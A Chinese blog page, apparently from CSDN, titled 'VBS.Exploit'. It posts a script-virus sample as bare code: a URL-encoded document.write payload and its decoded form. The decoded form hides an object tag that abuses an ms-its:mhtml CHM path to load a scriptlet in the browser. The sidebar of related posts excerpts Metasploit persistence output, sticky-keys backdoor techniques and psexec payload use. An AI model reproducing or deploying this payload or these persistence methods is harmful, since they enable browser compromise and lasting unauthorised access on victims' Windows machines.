VBS.Exploit

最新推荐文章于 2022-02-25 19:38:17 发布
最新推荐文章于 2022-02-25 19:38:17 发布
阅读量1.2k 收藏 1
点赞数
分类专栏: VisualBasic 文章标签: c javascript 脚本 path object file

脚本病毒名: VBS.Exploit
======================
脚本内容:
document.write(unescape("%3c%74%65%78%74%61%72%65%61%20%69%64%3d%22%63%6f%64%65%22%20%73%74%79%6c%65%3d%22%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%3b%22%3e%0d%3c%6f%62%6a%65%63%74%20%64%61%74%61%3d%22%26%23%31%30%39%3b%73%2d%69%74%73%3a%6d%68%74%6d%6c%3a%66%69%6c%65%3a%2f%2f%63%3a%5c%66%6f%6f%2e%6d%68%74%21%24%7b%70%61%74%68%7d%2f%74%65%73%74%2e%63%68%6d%3a%3a%2f%74%65%73%74%2e%68%74%6d%22%20%74%79%70%65%3d%22%74%65%78%74%2f%78%2d%73%63%72%69%70%74%6c%65%74%22%3e%3c%2f%6f%62%6a%65%63%74%3e%0d%3c%2f%74%65%78%74%61%72%65%61%3e%0d%3c%73%63%72%69%70%74%20%6c%61%6e%67%75%61%67%65%3d%22%6a%61%76%61%73%63%72%69%70%74%22%3e%0d%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%63%6f%64%65%2e%76%61%6c%75%65%2e%72%65%70%6c%61%63%65%28%2f%5c%24%7b%70%61%74%68%7d%2f%67%2c%6c%6f%63%61%74%69%6f%6e%2e%68%72%65%66%2e%73%75%62%73%74%72%69%6e%67%28%30%2c%6c%6f%63%61%74%69%6f%6e%2e%68%72%65%66%2e%69%6e%64%65%78%4f%66%28%27%6d%6d%2e%68%74%6d%27%29%29%29%29%3b%0d%3c%2f%73%63%72%69%70%74%3e"));

<textarea id="code" style="display:none;">
<object data="&#109;s-its:mhtml:file://c:/foo.mht!${path}/test.chm::/test.htm" type="text/x-scriptlet"></object>
</textarea>
<script language="javascript">
document.write(code.value.replace(//${path}/g,location.href.substring(0,location.href.indexOf('mm.htm'))));
</script>

slightboy
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctf杂项各类编码汇总
bwt_D的博客
05-19 2556
ascii编码 base64编码 url编码:%61%6c%66%7b%67%79%72%63%74%70%72%67%6f%70%61%69%5f%79%5f%73%73%61%65%7d%79 shellcode编码:\x54\x68\x65\x20 Quoted-printable(针对非英文,不会考):=E6=95=8F=E6=8D=B7… uuencode(没有特点) unicode(一般不考) 莫尔斯电码(经常考 short ook: . ? ! c8 e9 ac a0 c6 f2 e
url中的20%、22%、26%、7B%、%7D、28%、29%怎么解析还原成真实的字符
热门推荐
透明大脑
09-21 19万+
URL编码表 backspace 8% A 41% a 61% § %A7 Õ %D5   tab 9% B 42% b 62% « %AB Ö %D6   linefeed %0A C 43% c
android通过webview调起支付宝app支付
Jaelyn的博客
11-22 2万+
android通过webview调起支付宝app支付
xss攻击入门
weixin_34067102的博客
04-06 338
xss表示Cross Site Scripting(跨站脚本攻击),它与SQL注入攻击类似,SQL注入攻击中以SQL语句作为用户输入,从而达到查询/修改/删除数据的目的,而在xss攻击中,通过插入恶意脚本,实现对用户游览器的控制。 xss攻击可以分成两种类型: 非持久型攻击 持久型攻击 下面我们通过具体例子,了解两种类型xss攻击。   1.非持久型xss攻击 顾名思义,非持...
毒霸07.11.19.18版本 新增加922个查杀病毒
首席技术执行官CTO(Chief Technology Officer)|技术总监--邓斌博客
12-01 4624
毒霸病毒信息库07.11.19.18版本新增可查杀病毒数922,其中:木马黑客蠕虫病毒数:731; 风险病毒数:170 其他病毒数:21。1. JS.Exploitbd.tv2. VBS.Exploitbd.tt3. Win32.Adware.VirtumondeT.de.3190724. Worm.AllapleT.b.732165. Win32.Adware.AgentT.da.13516
【kali】Mestasploit——基本使用2、Exploit模块、playload、metepreter
(∪.∪ )...zzz的博客
10-27 1228
这里写自定义目录标题Exploit模块1. Active exploitpsexec2. Passive Exploits Exploit模块 1. Active exploit 攻击者主动连接受害者 payload发给受害者执行 psexec use exploit/windows/smb/psexec # 基于smb协议 # 需要目标机的权限 # 利用psexec模块 # 在132上执行该模块的payload后将shell反弹给161kali的4444端口 set RHOST 192.168.98
Windows后渗透--维持权限十九式
weixin_44155363的博客
06-15 1607
0x00:前言 维持权限后门是指当入侵者通过某种手段拿到服务器的控制权之后,通过在服务器上放置一些后门(脚本、进程、连接之类),来方便他以后持久性的入侵,简单梳理一下日常遇见windows用的比较多的一些持久化方式方便以后排查问题使用. 0x01:"经典的"shift后门 这个算是比较古老还比较"经典的"的隐藏方式了,这里简单讲一下,在windows中有一些辅助功能,能在用户未登录系统之前可以通过组合键来启动它,类似的辅助功能有: 1、C:\Windows\System32\sethc.exe 粘滞键,启动
利用工具exploit com控件
在路上
08-05 662
    浏览器中的ActiveX控件中如果存在溢出漏洞,则同样十分容易被利用。     下面介绍几种工具及方法。      1. 首先需要手动注册com          方法:                    regsvr32 xxx.dll      2. 所注册的com实际上都存在于注册表中: 在路径HKEY_CLASSES_ROOT\CLSID中,以一串唯一的G...
ActiveX漏洞通用Exploit vbs修正版
09-06
作者:疯狗终于在milw0rm找到了一个不错的shellcode,down&exec的,灰常好用!顺手写了一个C测试了下,结果是成功下载并执行了"木马",muma.exe是我用delphi写的一个简单的执行测试程序,无毒无害。
高危Windows 0day漏洞
10-08
在历史上有一个类似的案例——“新欢乐时光”病毒(VBS.KJ)。该病毒会在每个文件夹下生成desktop.ini和folder.htt文件,控制文件夹在资源管理器中的显示。只需打开被病毒修改过的含有desktop.ini和folder.htt的...
msf6 exploit(windows/local/persistence) > run [*] Running persistent module against DESKTOP-UL26GPM via session ID: 7 [+] Persistent VBS script written on DESKTOP-UL26GPM to C:\Users\1-2\AppData\Local\Temp\znovHQot.vbs [*] Installing as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\kkapahXyyH [+] Installed autorun on DESKTOP-UL26GPM as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\kkapahXyyH [*] Clean up Meterpreter RC file: /home/kali/.msf4/logs/persistence/DESKTOP-UL26GPM_20230717.4409/DESKTOP-UL26GPM_20230717.4409.rc
最新发布
07-20
根据您提供的Metasploit命令输出,您正在运行`exploit/windows/local/persistence`模块来创建持久性后门。下面是命令的执行结果: - 持久性VBS脚本已经被写入目标主机 DESKTOP-UL26GPM 的 `C:\Users\1-2\AppData\...
K8s 很难么?带你从头到尾捋一遍,不信你学不会
民工哥的博客
02-23 9011
点击关注公众号,回复“1024”获取2TB学习资源!为什么要学习 Kubernetes?虽然 Docker 已经很强大了,但是在实际使用上还是有诸多不便,比如集群管理、资源调度、文件管理等...
10天智能锁项目实战第1天(了解单片机STM32F401RET6和C语言基础)
北豼不太皮的博客
02-21 3549
10天智能锁项目实战第1天(了解单片机STM32F401RET6和C语言基础)一、学习目标二、了解单片机STM32F401RET6三、C语言基础 一、学习目标 二、了解单片机STM32F401RET6 4、STM32F401RE特征 三、C语言基础 1.数据类型 常用2的次方: 2^7 = 128 2^8 = 256 2^15 = 32768 2^16= 65536 51单片机常见的数据类型: char: 占内存1字节 取值范围:-128~127 -2^7 ~ 2
Android开发(1) | Fragment 的应用——新闻应用
Jormungand_V的博客
02-21 7032
文章目录 news_item.xml: <TextView xmlns:android="http://schemas.android.com/apk/res/android" android:id="@+id/news_title" android:layout_width="match_parent" android:layout_height="wrap_content" android:lines="1" android:ellipsize="
系统学习 TypeScript(四)——变量声明的初步学习
编程三昧
02-25 1712
认识了 TypeScript 中的基础类型,接下来当然是变量声明的相关学习了,我在这里记录一下我学习过程中的一些总结。
清除浮动的五种方法
weixin_52212950的博客
02-22 2675
为什么要清除浮动?因为往往浮动后的子元素因为脱离了标准流,不能自动撑起父元素的高度,所以会对后续布局产生影响,对此清除浮动不如理解为清除浮动产生的影响更为合理。 例如:我们设置了两个盒子如图所示,粉色为父盒子,只有宽度没有高度,蓝色盒子有宽有高,粉色盒子的高由蓝盒子的高度撑开。 但是给蓝色的子盒子设置了左浮动后,脱离了标准流,无法再撑开粉盒子,可以看到粉盒子高度变成了0; 清除浮动有五种方法: 直接设置父元素的高度 额外标签法 单伪元素法 双伪元素法 ove.
HTML实现学习网站首页
做技术,坚持才是最重要的,一时的热情只是暂时的进步
02-20 4124
项目访问 reset.css /* http://meyerweb.com/eric/tools/css/reset/ v2.0 | 20110126 License: none (public domain) */ html, body, div, span, applet, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre, a, abbr, acronym, address, big, cite, code, del
static -pthread ./exploit.c -o ./exploit ./exploit.c: In function ‘spray_simple_xattr’: ./exploit.c:142:9: warning: implicit declaration of function ‘mkdir’ [-Wimplicit-function-declaration] 142 | if (mkdir("/tmp/tmpfs", S_IRWXU) == -1 && errno != EEXIST) | ^~~~~ ./exploit.c: In function ‘print_hex’: ./exploit.c:243:23: warning: format ‘%llx’ expects argument of type ‘long long unsigned int’, but argument 2 has type ‘size_t’ {aka ‘long unsigned int’} [-Wformat=] 243 | printf(" %16llx",*(size_t * )(buf + i*8)); | ~~~~~^ ~~~~~~~~~~~~~~~~~~~~~~~ | | | | | size_t {aka long unsigned int} | long long unsigned int | %16lx ./exploit.c: In function ‘get_root_shell’: ./exploit.c:354:3: warning: null argument where non-null required (argument 2) [-Wnonnull] 354 | execve("/tmp/dummy", NULL, NULL); | ^~~~~~
06-07
根据您的问题描述,这似乎是一个编译警告信息,并不影响代码的运行。其中包括: 1. `implicit declaration of function ‘mkdir’` 表示您的代码中使用了mkdir函数,但是编译器没有找到该函数的声明,需要添加头文件`#include <sys/stat.h>`。 2. `format ‘%llx’ expects argument of type ‘long long unsigned int’, but argument 2 has type ‘size_t’` 表示在打印输出时使用了错误的格式标识符。应该将`%llx`改为`%lx`。 3. `null argument where non-null required (argument 2)` 表示您在`execve()`函数中使用了NULL参数,但该参数不能为NULL。您需要将第二个和第三个参数设置为合适的值。 请您检查一下代码并进行相应的修改,以消除这些警告信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值